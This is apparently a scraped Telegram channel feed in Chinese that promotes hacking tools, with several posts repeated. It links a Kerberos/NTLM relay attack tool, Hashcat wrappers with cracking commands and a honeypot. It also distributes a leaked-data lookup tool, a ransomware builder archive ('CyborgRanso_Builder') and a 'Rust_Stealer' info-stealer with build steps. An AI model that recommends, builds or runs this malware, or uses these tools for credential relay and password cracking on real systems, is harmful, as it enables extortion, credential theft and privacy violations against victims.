KrbRelayEx是一种利用 Kerberos 和 NTLM 漏洞的工具,允许基于身份验证中继进行攻击。它适用于调查 Active Directory 基础设施中的漏洞的渗透测试人员和网络安全专业人员。
该存储库包含各种攻击技术,包括:
- Kerberos 中继- 使用传输的凭证绕过限制。
- NTLM 中继- 通过身份验证操纵来增加权限。
-调试和测试是调查保护机制的工具
https://github.com/decoder-it/KrbRelayEx
🧐@Topert4_com #C #
该存储库包含各种攻击技术,包括:
- Kerberos 中继- 使用传输的凭证绕过限制。
- NTLM 中继- 通过身份验证操纵来增加权限。
-调试和测试是调查保护机制的工具
https://github.com/decoder-it/KrbRelayEx
🧐@Topert4_com #C #
这个HellPot存储库是攻击者的蜜罐陷阱,它可以生成虚假漏洞和诱饵数据,使自动攻击更加困难。该项目旨在分散那些利用网络应用程序漏洞的机器人和扫描器的注意力。
主要特点:
- 创建模拟真实弱点的“陷阱”。
- 防止自动攻击和扫描。
- 易于安装和配置
https://github.com/yunginnanet/HellPot
🧐@Topert4_com #go
主要特点:
- 创建模拟真实弱点的“陷阱”。
- 防止自动攻击和扫描。
- 易于安装和配置
https://github.com/yunginnanet/HellPot
🧐@Topert4_com #go
This media is not supported in your browser
VIEW IN TELEGRAM
HashCrack — 是一款支持多种算法和字典攻击的哈希破解工具。
🔹 主要功能:
- 支持常见的哈希算法(MD5、SHA-1、SHA-256等)。
- 使用字典攻击进行密码破解。
- 支持自定义字典。
- 通过CLI简单使用。
🔹 如何使用?
安装依赖:
开始破解哈希:
其中:
-
-
-
https://github.com/ente0/hashCrack?tab=readme-ov-file
🧐@topert4_com #PYthon #密码破解
基于 Python 的 Hashcat 包装器,可轻松解密。
🔹 主要功能:
- 支持常见的哈希算法(MD5、SHA-1、SHA-256等)。
- 使用字典攻击进行密码破解。
- 支持自定义字典。
- 通过CLI简单使用。
🔹 如何使用?
安装依赖:
pip install -r requirements.txt
开始破解哈希:
python hashCrack.py -m sha256 -H <hash> -w wordlist.txt
其中:
-
-m — 哈希算法,-
-H — 待破解的哈希值,-
-w — 字典文件路径。https://github.com/ente0/hashCrack?tab=readme-ov-file
🧐@topert4_com #PYthon #密码破解
This media is not supported in your browser
VIEW IN TELEGRAM
基于 Shell 的Hashcat包装器,为密码破解任务提供精简、用户友好的界面。此工具使用户能够通过直观的菜单驱动界面进行各种攻击类型(包括单词表、基于规则的攻击、暴力攻击和混合攻击)。
特征
-多种攻击类型:单词表、规则、暴力攻击和混合攻击。
-用于攻击配置和选择的交互式菜单。
-会话恢复支持,用于恢复中断的会话。
-跨平台兼容性(Linux 和 Windows)。
安装命令:
https://github.com/ente0/Crack_Master
@topert4_com #Pyhton #密码破解
特征
-多种攻击类型:单词表、规则、暴力攻击和混合攻击。
-用于攻击配置和选择的交互式菜单。
-会话恢复支持,用于恢复中断的会话。
-跨平台兼容性(Linux 和 Windows)。
安装命令:
sudo apt update && sudo apt install hashcat aircrack-ng hcxtools hcxdumptool git
https://github.com/ente0/Crack_Master
@topert4_com #Pyhton #密码破解
KIKASSOFT.zip
22.6 KB
KIKAS SOFT 漏洞搜索工具,软件功能如下:
1) 搜索 LEAK OSINT 数据库。
2) 如果点击 3,执行 HLR 搜索(即验证号码)。
如何启动?
1) 将您的 LEAK OSINT 机器人令牌放入 key.txt 文件中。
2) 进入文件路径,并运行 `python main.py`。
#python
1) 搜索 LEAK OSINT 数据库。
2) 如果点击 3,执行 HLR 搜索(即验证号码)。
如何启动?
1) 将您的 LEAK OSINT 机器人令牌放入 key.txt 文件中。
2) 进入文件路径,并运行 `python main.py`。
#python
CyborgRanso_Builder v2.0.1.7z
5.7 MB
Cyborg Ransomware Builder 版本 2.0.1 -
软件要求:
.net framework 3.5(包括 .net 2.0 和 3.0)
Rust_Stealer.7z
98.5 KB
添加机器人和频道 ID 后
如何构建:
运行 cargo build --release
